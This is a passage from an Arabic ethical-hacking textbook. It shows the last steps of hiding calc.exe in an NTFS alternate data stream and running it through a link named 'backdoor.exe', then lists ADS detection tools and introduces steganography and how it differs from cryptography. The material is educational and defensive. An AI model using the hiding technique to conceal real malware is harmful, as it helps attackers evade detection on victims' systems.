‫‪ -8‬اﻻن ﻧﻘوم ﺑطﺑﺎﻋﺔ اﻟﺳطر اﻟﺗﺎﻟﻲ وذﻟك ﻟﻌﻣل رﺑط ﻟﻠﻣﻠف ‪ calc.exe‬اﻟﻣﺧﺑﺄ ﻓﻲ اﻟﻣﻠف ‪.readme.txt‬‬
‫‪C:\ mklink backdoor.exe readme.txt:calc.exe‬‬
‫‪ -9‬ﺛم اﻟﻧﻘر ﻓوق ‪.Enter‬‬
‫‪ -10‬ﻋﻧد طﺑﺎﻋﺔ ‪ backdoor‬ﻓﻲ ﺳطر اﻷواﻣر ﻓﮭذا ﺳوف ﯾؤدى اﻟﻰ ﺗﺷﻐﯾل اﻻﻟﮫ اﻟﺣﺎﺳﺑﺔ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪452‬‬

‫‪Ntfs Stream Detector: StreamArmor‬‬


‫اﻟﻣﺻدر‪http://securityxploded.com :‬‬
‫ھذه اﻷداة ﺗﺳﺎﻋدك ﻋﻠﻰ اﻟﻛﺷف ﻋﻠﻰ ﺗدﻓﻖ اﻟﺑﯾﺎﻧﺎت اﻟﺑدﯾل )‪ (ADS‬اﻟﻣﺧﺑﺄ وإزاﻟﺗﮫ ﻣن اﻟﻧظﺎم اﻟﺧﺎص ﺑك ﺗﻣﺎﻣﺎ‪ .‬وھو‬
‫‪ Multithreaded ADS scanner‬ﺑﺣﯾث ﯾﺳﺎﻋدك ﻋﻠﻰ اﻟﻔﺣص اﻟﻣﺗﻛرر ﻋﻠﻰ اﻟﻧظﺎم ﺑﺄﻛﻣﻠﮫ واﻟﻛﺷف ﻋن ﻛل ‪ Streams‬اﻟﻣﺧﺑﺄة ﻓﻲ‬
‫اﻟﻧظﺎم اﻟﺧﺎص ﺑك‪ .‬ﯾﻣﻛﻧك ﺑﺳﮭوﻟﺔ اﻛﺗﺷﺎف ﺗدﻓﻖ اﻟﺑﯾﺎﻧﺎت اﻟﻣﺷﺑوھﺔ ﻣن ﺗدﻓﻖ اﻟﺑﯾﺎﻧﺎت اﻟﻌﺎدﯾﺔ ﻛﻣﺎ ﯾﻌرض ‪ Stream‬ﻣﻌﯾن اﻛﺗﺷف ﻣﻊ ﻧﻣط‬
‫ﻟون ﻣﺣدد‪ .‬ﻛﻣﺎ أﻧﮫ ﻗﺎدر ﻋﻠﻰ اﻟﻛﺷف ﻋن ﻧوع ‪ Streams‬ﻟﻠﻣﻠف ﺑﺎﺳﺗﺧدام أﻟﯾﺔ‪.Advance File type detection mechanism‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪453‬‬

‫‪NTFS Stream Detector: Other Tools‬‬


‫ھﻧﺎك اﻟﻌدﯾد ﻣن أدوات اﻟﻛﺷف ﻋن ‪ NTFS Stream‬اﻟﻣﺗﺎﺣﺔ ﻓﻲ اﻟﺳوق‪ .‬ﯾﻣﻛﻧك اﻟﻛﺷف ﻋن اﻟﺗدﻓﻘﺎت اﻟﻣﺷﺑوھﺔ ﻣﻊ أدوات اﻟﻛﺷف ﻋن‬
‫‪ NTFS Stream‬اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫‪ADS Spy available at http://www.merijn.nu‬‬


‫‪ADS Manager available at http://dmitrybrant.com‬‬
‫‪Streams available at http://technet.microsoft.com‬‬
‫‪Alternatestreamview available at http://www.nirsoft.net‬‬
‫‪NTFS-Streams: ADS manipulation tool available at http://sourceforge.net‬‬
‫‪Stream Explorer available at http://www.rekenwonder.com‬‬
‫‪ADS Scanner available at http://www.pointstone.com‬‬
‫‪RKDetector available at http://www.rkdetector.com‬‬
‫‪GMER available at http://www.gmer.net‬‬
‫‪Hijack This available at http://free.antivirus.com‬‬

‫‪STEGANOGRAPHY‬‬

‫ﻛﺛﯾرة ھﻲ اﻟطرق أو اﻟوﺳﺎﺋل اﻟﺗﻲ ﯾﺳﺗﻐﻠﮭﺎ ﺑﻌض ﻣن ﺗﺳول ﻟﮫ ﻧﻔﺳﮫ اﻟﻌﺑث ﺑﻣﻣﺗﻠﻛﺎت اﻟﻐﯾر‪ ،‬ﺳواء ﻛﺎﻧت أﺷﯾﺎء ﻣﻠﻣوﺳﺔ أو ﻣﻌﻠوﻣﺎت ﻣﺧزﻧﺔ ﻓﻲ‬
‫اﻷﺟﮭزة اﻟﺣﺎﺳوﺑﯾﺔ‪ .‬وﻓﻲ اﻟﻌﺻر اﻟﺣدﯾث أو ﻣﺎ ﯾﺳﻣﻰ ﺑﻌﺻر اﻟﻣﻌﻠوﻣﺎﺗﯾﺔ‪ ،‬ﺗﻧﺎﻣت ﻗﯾﻣﺔ اﻟﻣﻌﻠوﻣﺎت ﻟدرﺟﺔ ﺗﻔوق ﺑﻣراﺣل اﻟﻣﻣﺗﻠﻛﺎت اﻟﺣﺳﯾﺔ‪،‬‬
‫وھذا ﻣﺎ أﺛرى اﻟﺑﺣث ﻓﻲ ﻣﺟﺎل اﻟوﺳﺎﺋل اﻟﺗﻲ ﯾﻣﻛن ﻣن ﺧﻼﻟﮭﺎ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻋﻣن ﻻ ﯾﻣﺗﻠﻛﮭﺎ ووﺿﻌﮭﺎ ﻓﻲ ﻣﺄﻣن‪ ،‬وﻛذﻟك اﻟوﺳﺎﺋل اﻟﺗﻲ‬
‫ﯾﻣﻛن ﻣن ﺧﻼﻟﮭﺎ ﻛﺷف أي ﻣﻌﻠوﻣﺎت ﻣﺧﺑﺄة ﺑطرﯾﻘﺔ ﻏﯾر ﺷرﻋﯾﺔ‪ .‬وﻋﻧد اﻟﺣدﯾث ﻋن إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت‪ ،‬ﻓﺈن أول ﻣﺎ ﯾﺗﺑﺎدر إﻟﻰ اﻟذھن ھو ﻋﻣﻠﯾﺔ‬
‫ﺗﺷﻔﯾر اﻟﻣﻌﻠوﻣﺎت)‪ (Cryptography‬أو ﺗﺣوﯾﻠﮭﺎ إﻟﻰ ﺻﯾﻐﺔ أﺧرى ﻏﯾر ﻣﻔﮭوﻣﺔ إﻻ ﺑﺎﺳﺗﺧدام ﻣﻔﺗﺎح اﻟﺷﻔرة أو ال)‪ .(key‬ﻟﻛن ھذا ﻻ ﯾﻌﻧﻲ‬
‫أن اﻟﺗﺷﻔﯾر ھو اﻟطرﯾﻘﺔ اﻟوﺣﯾدة اﻟﺗﻲ ﯾﻣﻛن ﻣن ﺧﻼﻟﮭﺎ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻋن اﻟﻐﯾر‪ .‬ﻓﻲ اﻟواﻗﻊ‪ ،‬ھﻧﺎك ﻓن آﺧر ﯾﻘﺿﻰ ﺑﺈﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت ﻛﻠﯾﺎ‬
‫ﻟﻠﺗواﺻل ﻣﺎ ﺑﯾن ﺟﮭﺗﯾن ﻟﺗﺻﺑﺢ ھذه اﻟﺑﯾﺎﻧﺎت أو ھذا اﻻﺗﺻﺎل ﻏﯾر ظﺎھر ﻣن اﻷﺳﺎس ﻟﺟﮭﺔ ﺛﺎﻟﺛﺔ وھذا ﻣﺎ ﯾﻌرف ب‪.Steganography‬‬
‫واﻟﺗﻲ ﻛﺛﯾرا ﻣﺎ ﺗﺳﺗﺧدم ﻣن ﻗﺑل ﻟﺻوص اﻟﻣﻌﻠوﻣﺎت ﻟﺳرﻗﺔ ﻣﻌﻠوﻣﺎت ﺣﺳﺎﺳﺔ‪ .‬إذن‪ ،‬ﻓﻣﺎ ھﻲ اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ‪ ،‬وﻛﯾف ﺗﺳﺗﺧدم‪ ،‬وھل ﯾﻣﻛن‬
‫اﻛﺗﺷﺎﻓﮭﺎ واﻟﺗﺣﻔظ ﻣﻧﮭﺎ؟ ﺳﺄﺣﺎول إﺟﺎﺑﺔ ھذه اﻷﺳﺋﻠﺔ ﺑطرﯾﻘﺔ ﻣﺑﺳطﺔ ﻓﻲ اﻟﺳطور اﻟﺗﺎﻟﯾﺔ‪.‬‬

‫ﻛﻠﻣﺔ ‪ Steganography‬أو إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ھﻲ اﻟطرﯾﻘﺔ أو اﻟﺗﻘﻧﯾﺔ ﻟﺣﺟب وإﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت داﺧل وﺳﯾط رﻗﻣﻲ ﺑﻐرض ﻧﻘﻠﮭﺎ ﻋﺑر ھذا‬
‫اﻟوﺳﯾط إﻟﻰ ﻣﻛﺎن آﺧر ﺣﯾث ﯾﺳﺗﻌﻣل ھذا اﻟوﺳط‪ ،‬وذﻟك ﺣﺗﻰ ﯾﺗم إﺧﻔﺎء أن ھﻧﺎك اﺗﺻﺎل أو ﺗﺑﺎدل ﻣﻌﻠوﻣﺎت‪ .‬ﯾﺗم ﻓﻲ اﻟﺧﻔﺎء‪ ،‬وﻻ ﯾﻛون ﻋﻠﻰ ﻋﻠم‬
‫ﺑﮭذا اﻻﺗﺻﺎل إﻻ اﻷﺷﺧﺎص اﻟﻣﻌﻧﯾﯾن‪.‬‬
‫ﻓﻌﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬ﻗد ﯾﺳﺗﺧدم ﺷﺧص ﻣﺎ ﺻورة إﻟﻛﺗروﻧﯾﺔ ﻟﻧﻘل رﺳﺎﺋل ﻧﺻﯾﺔ )أو ﺣﺗﻰ ﺻور ﻣﺧﻔﯾﺔ( إﻟﻰ ﺷﺧص آﺧر دون أن ﯾﻌﻠم أﺣد‪ .‬ﻓﻛل‬
‫ﻣن ﯾﻧظر ﻣن اﻟﺧﺎرج ﯾظن أن اﻟﺷﺧﺻﯾن ﯾﺗﺑﺎدﻻن ﺻورا‪ ،‬ﺑﯾﻧﻣﺎ ھذه اﻟﺻور ﻣﺣﻣﻠﺔ ﺑرﺳﺎﺋل ﻣﺧﻔﯾﺔ ﻏﯾر واﺿﺣﺔ ﻟﻠﻌﯾﺎن‪.‬‬
‫ﻛﻠﻣﺔ ‪ Steganography‬أﺳﺎﺳﺎ ﻣﺷﺗﻘﺔ ﻣن ﻛﻠﻣﺔ ﯾوﻧﺎﻧﯾﺔ وﺗﻌﻧﻲ “اﻟﻛﺗﺎﺑﺔ اﻟﻣﺧﻔﯾﺔ” ﻣن اﻟﻛﻠﻣﺔ )‪ ,"steganos",( στεγανός‬ﺳﺗﯾﻐﺎﻧوس‪،‬‬
‫وﺗﻌﻧﻲ اﻟﻣﺣﻣﻲ أو اﻟﻣﻐطﻰ‪ ،‬واﻟﻛﻠﻣﺔ )‪ ،”graphei",( γραφή‬ﻏراﻓﻲ‪ ،‬وﺗﻌﻧﻲ اﻟﻛﺗﺎﺑﺔ‪ .‬ﻣوﺿوع إرﺳﺎل اﻟرﺳﺎﻟﺔ اﻟﻣﺧﻔﯾﺔ ﻋن طرﯾﻖ ﺣﺟب أن‬
‫ھﻧﺎك ﺷﻲء ﻣرﺳل ﻣن اﻷﺳﺎس‪ .‬ھﻲ طرﯾﻘﺔ وﻓﻛرة ﻗدﯾﻣﺔ وﻟﮭﺎ ﻗﺻﺔ ﺗﺎرﯾﺧﯾﺔ ﻓﻘدﻣﺎء اﻹﻏرﯾﻖ اﻋﺗﺎدوا ﻣﺛﻼً ﺣﻔر اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﻋﻠﻰ طﺎوﻻت‬
‫ﻣن اﻟﺧﺷب‪ ،‬ﺛم ﯾﻐطوﻧﮭﺎ ﺑطﺑﻘﮫ ﻣن اﻟﺷﻣﻊ‪ .‬وﺣﯾن ﺗﺻل اﻟرﺳﺎﻟﺔ ﻋﻠﻰ اﻟﺷﺧص اﻟﻣﻘﺻود‪ ،‬ﯾﻘوم ﺑﺈزاﻟﺔ أو إذاﺑﺔ اﻟﺷﻣﻊ ﻟﯾﺣﺻل ﻋﻠﻰ رﺳﺎﻟﺗﮫ‪.‬‬
‫ﻛذﻟك اﺳﺗﺧدم اﻹﻏرﯾﻖ وﺳﯾﻠﺔ أﺧرى ﻟﻧﻔس اﻟﻐرض‪ ،‬وإن ﻛﺎﻧت وﺣﺷﯾﺔ ﺑﻌض اﻟﺷﻲء‪ ،‬ﺑﻣﻘﺎﯾﯾس ﻋﺻرﻧﺎ ﺑﺎﻟطﺑﻊ‪ .‬ﺣﯾث ﻛﺎﻧوا ﯾﻘوﻣون ﺑﺣﻠﻖ‬
‫رؤوس اﻟﻌﺑﯾد‪ ،‬ﺛم ﯾﺗم )وﺷم( اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﻋﻠﻰ ھذه اﻟرؤوس اﻟﺑﺎﺋﺳﺔ‪ .‬ﺑﻌدھﺎ ﯾﺣﺑﺳون اﻟﺷﺧص ﺣﺗﻰ ﯾطول ﺷﻌره‪ ،‬ﻓﯾﻐطﻲ ﻓروة رأﺳﮫ‬
‫)واﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﻣﻌﮭﺎ(‪ ،‬وﯾرﺳﻠوﻧﮫ إﻟﻰ اﻟطرف اﻵﺧر‪ .‬وﺣﯾن ﯾﺻل إﻟﻰ ھﻧﺎك‪ ،‬ﯾﻘوم ھذا اﻷﺧﯾر ﺑﺣﻠﻖ رأس اﻟﻌﺑد‪ ،‬وﯾﻘرأ اﻟرﺳﺎﻟﺔ‪ .‬وﻓﻲ‬
‫اﻟﻌﺻر اﻟﺣدﯾث ﻛﺎن اﻟﺣﺑر اﻟﺳري أﺣد أھم أدوات اﻟﻌﻣﻼء واﻟﻣﺧﺑرﯾن ﺧﻼل اﻟﺣرب اﻟﻌﺎﻟﻣﯾﺔ اﻟﺛﺎﻧﯾﺔ‪.‬‬
‫وﻓﻲ اﻟﻌﺎﻟم اﻟرﻗﻣﻲ‪ ،‬ﯾﺗم إﺧﻔﺎء أي ﻧوع ﻣن اﻟﺑﯾﺎﻧﺎت واﻟﻣﻠﻔﺎت‪ ،‬داﺧل أﻧواع ﻋدﯾدة وﻣﺧﺗﻠﻔﺔ ﻣن اﻟﻣﻠﻔﺎت‪ .‬ﻛﻣﺎ أن أﺣد اﻟﺗطﺑﯾﻘﺎت اﻟﺗﻲ ظﮭرت‬
‫ﻧﺗﯾﺟﺔ ﻟﮭذه اﻟﺗﻘﻧﯾﺔ‪ ،‬ھﻲ إﻧﺷﺎء ﺣﯾز ‪ Partition‬داﺧل اﻟﻘرص اﻟﺻﻠب‪ ،‬ﯾُﻔ ّﻌل ﺗﻠﻘﺎﺋﯾﺎ ﻋﻧد ﺗﺷﻐﯾل اﻟﺟﮭﺎز وﯾﺳﺗﺧدم ﻟﺗﺧزﯾن اﻟﻣﻌﻠوﻣﺎت اﻟﻣراد‬
‫إﺧﻔﺎؤھﺎ‪ .‬أول ﺗﺳﺟﯾل ﻻﺳﺗﺧدام ھذا اﻟﻣﺻطﻠﺢ ﻛﺎن ﺳﻧﺔ ‪ 1499‬ﻣن ﻗﺑل ﯾوھﺎﻧس ﺗرﯾﺛﯾﻣوس"‪ ، "Johannes Trithemius‬ﻓﻲ ﻣﻘﺎﻟﺗﮫ‬
‫"‪"steganographia‬ﻋن اﻟﺗﺷﻔﯾر واﻟﻛﺗﺎﺑﺔ اﻟﻣﺧﻔﯾﺔ ﻋﻠﻰ ﺻورة ﻛﺗﺎب ﺗﻌﺎوﯾذ ﺳﺣرﯾﺔ‪ .‬وﻋﻣوﻣﺎً‪ ،‬ﻓﺈن اﻟرﺳﺎﺋل ﺳﺗظﮭر ﻋﻠﻰ أﻧﮭﺎ ﺷﻲء ﻣﻐﺎﯾر‬
‫ﻛﺻور أو ﻣﻘﺎﻻت أو ﻗواﺋم ﺑﯾﻊ أو أﺷﯾﺎء أﺧرى "ﻧص ﻏطﺎء”‪. "cover text‬‬
‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬
‫‪454‬‬

‫اﻟﻣﻔﮭوم اﻟﺗﻘﻠﯾدي ﻟﻠرﺳﺎﻟﺔ اﻟﻣﺧﻔﯾﺔ ھو أن ﺗﻛون ﻣﻛﺗوﺑﺔ ﺑﺣﺑر ﺧﻔﻲ ﺑﯾن اﻟﺳطور اﻟﻣرﺋﯾﺔ ﻟرﺳﺎﻟﺔ ﺧﺎﺻﺔ‪ .‬إن ﻣﯾزة اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ ﻋﻠﻰ اﻟﺗﺷﻔﯾر‬
‫اﻟﻣﺟرد‪ ،‬ھو أن اﻟرﺳﺎﻟﺔ ﺑﺣد ذاﺗﮭﺎ ﻻ ﺗﺟذب اﻻھﺗﻣﺎم‪ .‬اﻟرﺳﺎﺋل اﻟﻣﺷﻔرة ﺑوﺿوح‪ ،‬ﺑﻐض اﻟﻧظر ﻋن ﻗﺎﺑﻠﯾﺔ ﻓﻛﮭﺎ ﺗﺑدو ﻣرﯾﺑﺔ؛ ورﺑﻣﺎ ﯾُدان ﻛﺎﺗﺑﮭﺎ‬
‫ﻓﻲ اﻟﺑﻠدان اﻟﺗﻲ ﺗﻣﻧﻊ اﻟﺗﺷﻔﯾر ]‪ [1‬وﻓﻲ اﻟوﻗت اﻟذي ﯾﺣﻣﻲ اﻟﺗﺷﻔﯾر ﻣﺣﺗوى اﻟرﺳﺎﻟﺔ‪ ،‬ﯾﻣﻛن ﻟﻠﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ أن ﯾﺣﻣﻲ اﻟرﺳﺎﻟﺔ وأطراف اﻟﺗراﺳل‬
‫ﻣﻌﺎ ً‪.‬‬

‫ﯾﺷﻣل اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻓﻲ ﻣﻠﻔﺎت اﻟﺣﺎﺳوب‪ .‬ﻓﻲ اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ اﻟرﻗﻣﻲ ﯾﻣﻛن ان ﯾﺗﺿﻣن اﻻﺗﺻﺎل اﻻﻟﻛﺗروﻧﻲ ﺗرﻣﯾزا ﻣﺧﻔﯾﺎ‬
‫ﻓﻲ ﻣﺳﺗوى اﻟوﺳط اﻟﻧﺎﻗل‪ ،‬ﻣﺛل ﻣﻠف ﻣﺳﺗﻧد‪ ،‬ﻣﻠف ﺻورة‪ ،‬ﺑروﺗوﻛول‪ .‬ﻣﻠﻔﺎت اﻟوﺳﺎﺋط اﻟﻣﺗﻌددة ھﻲ اوﺳﺎط ﻣﺛﺎﻟﯾﺔ ﻟﻺرﺳﺎﻻت اﻟﻣﺧﻔﯾﺔ‪ ،‬ﺑﺳﺑب‬
‫ﻛﺑر ﺣﺟﻣﮭﺎ‪ .‬ﻛﻣﺛﺎل ﺑﺳﯾط‪ ،‬ﯾﻣﻛن ﻟﻣرﺳل أن ﯾﺳﺗﺧدم ﺻورة ﻏﯾر ﻣﻠﻔﺗﺔ‪ ،‬وﯾﻌدل ﻓﻲ ﻟون ﻧﻘطﺔ )‪ (pixel‬ﻟﻛل ﻣﺋﺔ ﻣن اﻟﻧﻘﺎط‪ ،‬ﻟﯾﻘﺎﺑل ﺣرف‬
‫اﺑﺟدي‪ .‬ﺳﯾﻛون اﻟﺗﻐﯾﯾر طﻔﯾﻔﺎ وﻏﯾر ﻣﺣﺳوس وﻣن ﻏﯾر اﻟﻣﺣﺗﻣل اﻛﺗﺷﺎﻓﮫ ﺑﺎﻟﻌﯾن اﻟﻣﺟردة‪.‬‬

‫اﻟﻔرق ﺑﯾن إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت واﻟﺗﺷﻔﯾر؟‬


‫اﻟﻛﺛﯾر ﻟدﯾﮫ ﺧﻠﻔﯾﺔ أو ﺳﻣﻊ ﺑﻣﺻطﻠﺢ اﻟﺗﺷﻔﯾر ‪ Cryptography‬واﻟذي ﯾﻌﻧﻲ ﺑﺎﺧﺗﺻﺎر ﺗﺷﻔﯾر اﻟﻣﻌﻠوﻣﺔ ﻟﺗﺻﺑﺢ ﻏﯾر ﻣﻔﮭوﻣﺔ وﻏﯾر ﻗﺎﺑﻠﺔ‬
‫ﻟﻠﻘراءة إﻻ ﻣن ﻗﺑل اﻟﺷﺧص اﻟذي ﯾﻣﺗﻠك ﻣﻔﺗﺎح اﻟﺗﺷﻔﯾر ﻟﻔك اﻟﺷﻔرة‪ .‬طﺑﻌﺎ ﻏرض اﻟﺗﺷﻔﯾر ﯾﻛون داﺋﻣﺎ ﻟﻐرض ﺣﻣﺎﯾﺔ وأﻣن اﻟﻣﻌﻠوﻣﺎت وأﺳﺑﺎب‬
‫ﺗﺷﻔﯾر اﻟﻣﻌﻠوﻣﺎت ﻛﺛﯾرة‪ ،‬ﻣﻧﮭﺎ ﻟﻐرض ﺗﺑﺎدل ﺑﯾﺎﻧﺎت ﺳرﯾﺔ ﺑﯾن ﺷرﻛﺎت ﻣﻌﯾﻧﺔ أو ﺑﯾن دواﺋر ﺣﻛوﻣﯾﺔ ﻣﻌﯾﻧﺔ ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪.‬‬
‫وﻟﻛن اﻟﻣﺻطﻠﺢ ‪ Steganography‬واﻟذي ﯾﻌﻧﻲ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﺑﺎﻟﻌرﺑﯾﺔ ﯾﺧﺗﻠف ﻋن اﻟﺗﺷﻔﯾر ﺑﺎﻟرﻏم ﻣن وﺟود اﻟﻛﺛﯾر ﻣن اﻟﺗﺷﺎﺑﮫ ﺑﯾﻧﮭﻣﺎ‪.‬‬
‫ھﻧﺎ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﯾﻌﻧﻲ ﺗﺧﺑﺋﺗﮭﺎ داﺧل وﺳﯾط أو ﺗﺣت ﻏطﺎء ﻣﻌﯾن ﺣﺗﻰ ﻻ ﯾﺗﺳﻧﻰ ﻷي ﺷﺧص ﻣﻌرﻓﺔ أن ھﻧﺎك ﻣﻌﻠوﻣﺎت ﻣﺧﻔﯾﺔ ﻣن‬
‫اﻷﺳﺎس‪.‬‬
‫إذا ﻧﺳﺗطﯾﻊ اﻟﻘول إن اﻟﻔرق اﻷﺳﺎﺳﻲ ﺑﯾن اﻟﺗﺷﻔﯾر وإﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ھو أن ﻋﻧد ﺗﺷﻔﯾر ﻣﻌﻠوﻣﺔ ﻣﺎ ﯾﺳﺗطﯾﻊ اﻟطرف اﻟﺛﺎﻟث ﻣﻌرﻓﺔ أن ھﻧﺎك‬
‫إﺗﺻﺎل ﯾﺗم ﻣﺎ ﺑﯾن ﺷﺧﺻﯾن أو ﻣﺟﻣوﻋﺗﯾن ﻟﻛﻧﮫ ﻻ ﯾﺳﺗطﯾﻊ ﻓﮭم اﻟﻣﻌﻠوﻣﺎت ﻷﻧﮭﺎ ﻣﺷﻔرة‪.‬‬
‫ﺑﯾﻧﻣﺎ ﻓﻲ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻻ ﯾﻛون ھﻧﺎك ﻋﻠم ﻷي طرف ﺛﺎﻟث ﺑﺄن ھﻧﺎك ﺷﻲء ﻣﺧﻔﻲ ﻓﻲ اﻟﺧﻔﺎء أو أن ھﻧﺎك إﺗﺻﺎل ﺑﯾن إﺛﻧﯾن ﯾﺗم ﻣن وراء‬
‫اﻟﻛواﻟﯾس ﻷﻧﮫ ﺗم اﺳﺗﺧدام وﺳﯾط ﻣﺎ ﻹﺧﻔﺎء ھذا اﻻﺗﺻﺎل‪.‬‬
‫اﻟﺷﻛل اﻟﺗﺎﻟﻲ ﯾوﺿﺢ أﻧواع وطرق ﺣﺟب اﻟﺑﯾﺎﻧﺎت واﻟﺗﻲ ﻣن ﺑﯾﻧﮭﺎ اﻟﺗﺷﻔﯾر وإﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت واﻷﻗﺳﺎم اﻟﻔرﻋﯾﺔ ﺗﺣت ﻛل ﻧوع‪.‬‬

‫ﻗد ﯾﺗﺳﺎءل اﻟﺑﻌض‪ .‬وﻣﺎ اﻟﺣﺎﺟﺔ إﻟﻰ إﺧﻔﺎء وﺟود اﻟﺑﯾﺎﻧﺎت وﻟم اﻟﺧوف؟ واﻟﺳﺑب ﯾﻌود إﻟﻰ وﺟود ﺣﺎﻻت ﻗد ﯾﻛون ﻓﯾﮭﺎ ﻣﺟرد وﺟود ﺷك ﻟدى‬
‫اﻟﺳﻠطﺎت أو اﻟﻌﺻﺎﺑﺎت أو ﻏﯾرھم‪ ،‬ﺑﺗﺳرب ﻣﻌﻠوﻣﺎت ﻣﺎ‪ ،‬ﻛﻔﯾل ﺑﺎﻟﻘﺿﺎء ﻋﻠﻰ ﺣﯾﺎة إﻧﺳﺎن! ﻛﻣﺎ ﻓﻲ ﺣﺎﻻت اﻧﺗﮭﺎﻛﺎت اﻟﺳﻠطﺎت ﻟﺣﻘوق اﻹﻧﺳﺎن‪،‬‬
‫وأﺛﻧﺎء اﻟﺣروب اﻷھﻠﯾﺔ‪ ،‬أو وﻟﻠﻣراﺳﻠﯾن واﻟﺻﺣﻔﯾﯾن اﻟذﯾن ﯾﻐطون اﻟﺣروب واﻟﻐزوات واﻟﻧزاﻋﺎت‪ ،‬اﻟراﻏﺑﯾن ﻓﻲ إﯾﺻﺎل اﻟﺣﻘﯾﻘﺔ ﻟﻠﻌﺎﻟم‪ ،‬دون أن‬
‫ﯾﻌرﺿوا ﺣﯾﺎﺗﮭم أو ﺣﯾﺎة ﻏﯾرھم ﻟﻠﺧطر‪.‬‬
‫وﻣﺛﺎل ﺟﯾد ﻋﻠﻰ ھذه اﻟﺣﺎﻻت‪ ،‬ﻣﺎ ﺣﺻل إﺑﺎن اﻟﺣرب اﻷھﻠﯾﺔ ﻓﻲ ﺟواﺗﯾﻣﺎﻻ‪ ،‬واﻟﺗﻲ ﻗﺗل ﻓﯾﮭﺎ ‪ 100000‬ﺷﺧص‪ ،‬ﻓﺑﺣﺳب ﻣﺎ ﯾذﻛره‬
‫)‪(Korhorn‬ﻓﺈن اﻟﻣﻧظﻣﺔ اﻟﻌﺎﻟﻣﯾﺔ ﻟﺣﻘوق اﻹﻧﺳﺎن )‪ (The International Center of Human Rights Research‬ﻗد ﺟﻣﻌت‬
‫ﺣواﻟﻲ ‪ 5000‬ﺷﮭﺎدة‪ ،‬ﻣن ﺷﮭود ﻋﯾﺎن‪ ،‬ﻋن طرﯾﻖ اﺳﺗﺧدام ھذه اﻟﺗﻘﻧﯾﺔ ﻣﻊ اﻟﺗﺷﻔﯾر‪ ،‬ﻓﺣﺻﻠت ﻋﻠﻰ اﻟﻣﻌﻠوﻣﺎت وﺣﺎﻓظت ﻋﻠﻰ ﺣﯾﺎة اﻟﺷﮭود‪.‬‬
‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬
‫‪455‬‬

‫ﻛﺑﯾرا ﻣن اھﺗﻣﺎم اﻟﺑﺎﺣﺛﯾن‪ ،‬ﻟﺳﺑب ﺑﺳﯾط وھو أن ﻟﮭﺎ اﺳﺗﺧداﻣﺎت ھﺎﻣﺔ ﻓﻲ اﻟﺗﺟﺎرة اﻹﻟﻛﺗروﻧﯾﺔ‪،‬‬ ‫ﺣﺎﻟﯾًﺎ ﺗﺷﻐل اﻷﺑﺣﺎث ﻓﻲ ﻣﺟﺎل ھذه اﻟﺗﻘﻧﯾﺔ‪ً ،‬‬
‫ﺣﯾزا ً‬
‫اﻟﺗﻲ ﺗزداد ﺗطﺑﯾﻘﺎﺗﮭﺎ‪ ،‬واﻻھﺗﻣﺎم ﺑﮭﺎ ﯾو ًﻣﺎ ﺑﻌد آﺧر‪ .‬ﺣﯾث ﻣن ﺗطﺑﯾﻘﺎﺗﮭﺎ اﻟﻌﻼﻣﺎت اﻟﻣﺎﺋﯾﺔ أو ﻣﺎ ﯾﻌرف ﺑـ )‪ .(Watermarks‬وﺗﺳﺗﺧدم ھذه‬
‫اﻷﺧﯾرة ﻓﻲ ﻋﻣﻠﯾﺎت ﺣﻔظ اﻟﺣﻘوق ﻟﻠﻣﻧﺗﺟﺎت اﻟرﻗﻣﯾﺔ‪ ،‬واﻟﺣد ﻣن ﻋﻣﻠﯾﺎت اﻟﻘرﺻﻧﺔ‪ ،‬ﻣﺛل اﻷﺳطواﻧﺎت اﻟﺧﺎﺻﺔ ﺑﺎﻟﻣوﺳﯾﻘﻰ وﻏﯾرھﺎ‪ ،‬وﻛذﻟك‬
‫اﻟﺻور واﻟﺑراﻣﺞ اﻟﺗﻲ ﺗﺑﺎع ﻋﺑر اﻹﻧﺗرﻧت‪ .‬ﻓﺑﺎﻟرﻏم ﻣن أن اﻟﻣﺷﺗري ھﻧﺎ ﻗد ﯾﻌﻠم ﺑوﺟود ھذه اﻟﻌﻼﻣﺎت‪ ،‬ﻟﻛﻧﮫ ﻻ ﯾﻌرف أﯾن ﺗوﺟد داﺧل اﻟﻣﻧﺗﺞ‪،‬‬
